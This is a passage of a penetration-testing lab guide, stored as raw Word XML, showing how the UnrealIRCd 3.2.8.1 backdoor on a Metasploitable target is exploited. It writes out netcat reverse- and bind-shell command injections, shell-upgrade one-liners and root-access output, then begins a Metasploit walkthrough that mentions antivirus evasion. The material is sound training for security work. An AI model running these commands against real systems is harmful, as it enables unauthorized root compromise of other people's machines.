    <w:p w14:paraId="3613C31F" w14:textId="621680AA" w:rsidR="0024441B" w:rsidRDefault="00EC27F5" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Here is a</w:t>
      </w:r>
      <w:r w:rsidR="00E301B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0024441B">
        <w:t xml:space="preserve">faster way to </w:t>
      </w:r>
      <w:r w:rsidR="00E301B3">
        <w:t>exploit it just</w:t>
      </w:r>
      <w:r w:rsidR="00243B9C">
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r w:rsidR="00E301B3">
        <w:t xml:space="preserve"> using Netcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E5285" w14:textId="1A3779BA" w:rsidR="00E1741B" w:rsidRDefault="00E1741B" w:rsidP="00E1741B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~/Documents# e</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>cho "AB; nc -e /bin/sh 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00657F8C">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00657F8C">
        <w:t xml:space="preserve">10 1234\n" | nc </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D08BB7" w14:textId="77777777" w:rsidR="00E1741B" w:rsidRDefault="00E1741B" w:rsidP="00E1741B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143EFC5F" w14:textId="098CA554" w:rsidR="00E301B3" w:rsidRDefault="00E1741B" w:rsidP="00E1741B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E4514" w14:textId="029909CC" w:rsidR="00CE467D" w:rsidRDefault="00CE467D" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44198D22" w14:textId="09106A4E" w:rsidR="00CE467D" w:rsidRDefault="00CE467D" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Both method</w:t>
      </w:r>
      <w:r w:rsidR="00EC4BF2">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> require a process </w:t>
      </w:r>
      <w:r w:rsidR="00243B9C">
        <w:t>listening on the attack machine, launched before.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> That is also </w:t>
      </w:r>
      <w:r w:rsidR="00197441">
        <w:t>accomplished</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using Netcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17426888" w14:textId="77777777" w:rsidR="00E1741B" w:rsidRDefault="00E1741B" w:rsidP="00E1741B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~/Documents# nc -vnlp 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B0D649" w14:textId="77777777" w:rsidR="00E1741B" w:rsidRDefault="00E1741B" w:rsidP="00E1741B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening on [any] 1234 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019A728" w14:textId="17C5BC8B" w:rsidR="00E1741B" w:rsidRDefault="00E1741B" w:rsidP="00E1741B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>connect to [192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00657F8C">
        <w:t>21.10</w:t>
      </w:r>
      <w:r>
        <w:t>] from (UNKNOWN) [</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>] 42852</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E6DF1" w14:textId="77777777" w:rsidR="00E1741B" w:rsidRDefault="00E1741B" w:rsidP="00E1741B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8E89A0" w14:textId="0DC89D71" w:rsidR="008E7768" w:rsidRDefault="00E1741B" w:rsidP="0015582D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5740AC51" w14:textId="63A724DD" w:rsidR="00CE467D" w:rsidRDefault="00CE467D" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now, try to obtain an interactive shell with some of the following command</w:t>
      </w:r>
      <w:r w:rsidR="009D3545">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE7B0D" w14:textId="77777777" w:rsidR="008E7768" w:rsidRPr="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E7768">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import pty; pty.spawn("/bin/bash")'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB5A80" w14:textId="77777777" w:rsidR="008E7768" w:rsidRPr="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E7768">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t>echo os.system('/bin/bash')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8897B" w14:textId="77777777" w:rsidR="008E7768" w:rsidRPr="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E7768">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t>/bin/sh -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AFD7BC" w14:textId="30939A01" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E7768">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t>perl —e 'exec "/bin/sh";'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2987DA87" w14:textId="77777777" w:rsidR="00A66389" w:rsidRPr="008E7768" w:rsidRDefault="00A66389" w:rsidP="00A66389">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD6B128" w14:textId="4B558806" w:rsidR="00CE467D" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00531D2A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://netsec.ws/?p=337</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for more shell spawning technics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B502ACB" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269DB681" w14:textId="20289588" w:rsidR="00CE467D" w:rsidRDefault="00CE467D" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This worked as expected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0652F6" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python -c "import pty; pty.spawn('/bin/bash')"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9687C" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@metasploitable:/etc/unreal# id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1A0A9A" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC02266" w14:textId="363B0F2D" w:rsidR="003721EF" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1FB9B" w14:textId="77777777" w:rsidR="008E7768" w:rsidRPr="008E7768" w:rsidRDefault="008E7768" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186C650F" w14:textId="466905BC" w:rsidR="003721EF" w:rsidRDefault="00B8538C" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Here is t</w:t>
      </w:r>
      <w:r w:rsidR="003721EF">
        <w:t>he bind shell version using Netcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C04FB" w14:textId="5BAD3B29" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kali:~/Documents# echo "AB; nc -lvnp 4444 -e /bin/sh" | nc </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F7D870" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B018D53" w14:textId="56A61C8B" w:rsidR="00E301B3" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A87C9D" w14:textId="77777777" w:rsidR="00B8538C" w:rsidRDefault="00B8538C" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA1DA1C" w14:textId="38C41D65" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then connect to the open port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223FEE00" w14:textId="298EBD5D" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>roo</w:t>
      </w:r>
      <w:r w:rsidR="00657F8C">
        <w:t xml:space="preserve">t@kali:~/Documents# nc </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2B8AD" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>/bin/bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059386B7" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A3C0FF" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python -c "import pty; pty.spawn('/bin/bash')"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302FB80D" w14:textId="77777777" w:rsidR="008E7768" w:rsidRDefault="008E7768" w:rsidP="008E7768">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@metasploitable:/etc/unreal# id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D42DE" w14:textId="5C994A90" w:rsidR="00B616D6" w:rsidRPr="00B616D6" w:rsidRDefault="008E7768" w:rsidP="00B616D6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6DE2EC" w14:textId="5D10E88F" w:rsidR="00F50385" w:rsidRDefault="008E7768" w:rsidP="004F2F94">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6A5D1" w14:textId="3AE73578" w:rsidR="00B616D6" w:rsidRDefault="00B616D6" w:rsidP="00B616D6">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F744C5" w14:textId="2F58DA70" w:rsidR="00B80C42" w:rsidRDefault="00B80C42" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E14165F" w14:textId="1BF4B878" w:rsidR="00D7099C" w:rsidRDefault="00D25D9A" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This section aims to present exploitation using </w:t>
      </w:r>
      <w:r w:rsidR="00460D9E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploit framework. Exploits exist for common vulnerabilities and Metasploit has more than 1000 modules to</w:t>
      </w:r>
      <w:r w:rsidR="003479BC">
        <w:t xml:space="preserve"> help attacker</w:t>
      </w:r>
      <w:r w:rsidR="00460D9E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004F2C8B">
        <w:t xml:space="preserve"> during an attack</w:t>
      </w:r>
      <w:r w:rsidR="003479BC">
        <w:t xml:space="preserve"> from recon to post exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00AA319B">
        <w:t xml:space="preserve"> going</w:t>
      </w:r>
      <w:r w:rsidR="003479BC">
        <w:t xml:space="preserve"> through exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53443B6C" w14:textId="750A1764" w:rsidR="00AA319B" w:rsidRDefault="00AA319B" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Once the attacker has chosen the right module, he still need</w:t>
      </w:r>
      <w:r w:rsidR="00BA39C9">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to set the correct parameters for the exploit to success.</w:t>
      </w:r>
      <w:r w:rsidR="006C0867">
        <w:t xml:space="preserve"> Parameters need to be set carefully </w:t>
      </w:r>
      <w:r w:rsidR="00411759">
        <w:t>as a wrong port might be blocked by firewall for example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D0711" w14:textId="09E4E111" w:rsidR="00E80A83" w:rsidRDefault="00342F2C" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Choosing the </w:t>
      </w:r>
      <w:r w:rsidR="00283C8F">
        <w:t>right payload, by</w:t>
      </w:r>
      <w:r w:rsidR="001E536A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>using a bind or a reverse shell depending on the system environment</w:t>
      </w:r>
      <w:r w:rsidR="00283C8F">
        <w:t xml:space="preserve"> is also a key point. Another </w:t>
      </w:r>
      <w:r w:rsidR="00571565">
        <w:t xml:space="preserve">thing </w:t>
      </w:r>
      <w:r w:rsidR="00283C8F">
        <w:t xml:space="preserve">that must </w:t>
      </w:r>
      <w:r w:rsidR="001E536A">
        <w:t>be considered</w:t>
      </w:r>
      <w:r w:rsidR="00283C8F">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> staged vs non</w:t>
      </w:r>
      <w:r w:rsidR="00B10804">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>staged payload.</w:t>
      </w:r>
      <w:r w:rsidR="00B531A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7FCC67" w14:textId="62A5E4B7" w:rsidR="00411759" w:rsidRDefault="00E80A83" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="007D653D">
        <w:t>non-staged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload will inject payload during the exploitation and execute it whereas a </w:t>
      </w:r>
      <w:r w:rsidR="00B531A1">
        <w:t xml:space="preserve">staged payload </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidR="00B531A1">
        <w:t xml:space="preserve">compromise the target in two </w:t>
      </w:r>
      <w:r>
        <w:t>steps</w:t>
      </w:r>
      <w:r w:rsidR="00B531A1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D787DF" w14:textId="654487F0" w:rsidR="00B531A1" w:rsidRDefault="00B531A1" w:rsidP="00B531A1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>the exploit is sent with a stager to the target</w:t>
      </w:r>
      <w:r w:rsidR="000A70BD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5C49C" w14:textId="358E77FA" w:rsidR="00B531A1" w:rsidRDefault="00B531A1" w:rsidP="00B531A1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>the stager  is responsible for downloading the payload (that might be larger), injecting it into the memory and the passing the execution to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320E890" w14:textId="0291C90E" w:rsidR="00AA319B" w:rsidRDefault="00074686" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Staging might be useful when there is a constraints on the payload size (you can see the maximum payload size by issuing the “show info” command on an exploit)</w:t>
      </w:r>
      <w:r w:rsidR="00071737">
        <w:t xml:space="preserve">. Another </w:t>
      </w:r>
      <w:r w:rsidR="00E4342D">
        <w:t>advantage</w:t>
      </w:r>
      <w:r w:rsidR="00071737">
        <w:t xml:space="preserve"> of staged payload is Anti-Virus evasion as the stager is smaller than a complete p</w:t>
      </w:r>
      <w:r w:rsidR="00204A24">
        <w:t>ayload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDACCEB" w14:textId="77777777" w:rsidR="00064F80" w:rsidRDefault="00064F80" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9097AC" w14:textId="57C8F3F7" w:rsidR="00AF45A2" w:rsidRDefault="00D7099C" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The goal is now to use Metasploit to exploit the same backdoor in UnrealIRCD and get a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDDC572" w14:textId="25F692F2" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>First, search for the right exploit to use and show its options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EE155" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf &gt; search ircd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B75B49" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7535DE73" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA3E74D" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED42D2" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092967EE" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name                                        Disclosure Date  Rank       Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1484CFAF" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----                                        ---------------  ----       -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46202538" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0064DA8A" w14:textId="7827A9F4" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3820A1D9" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf &gt; use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDC0C6" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0943F8" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50816B57" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFFD854" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Module: exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651ABB52" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Platform: Unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D912A74" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       Arch: cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55169309" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Privileged: No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E139383" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    License: Metasploit Framework License (BSD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F013A" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       Rank: Excellent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAED27B" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Disclosed: 2010-06-12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD8C4E" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8C5B15" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Provided by:</w:t>
      </w:r>
    </w:p>
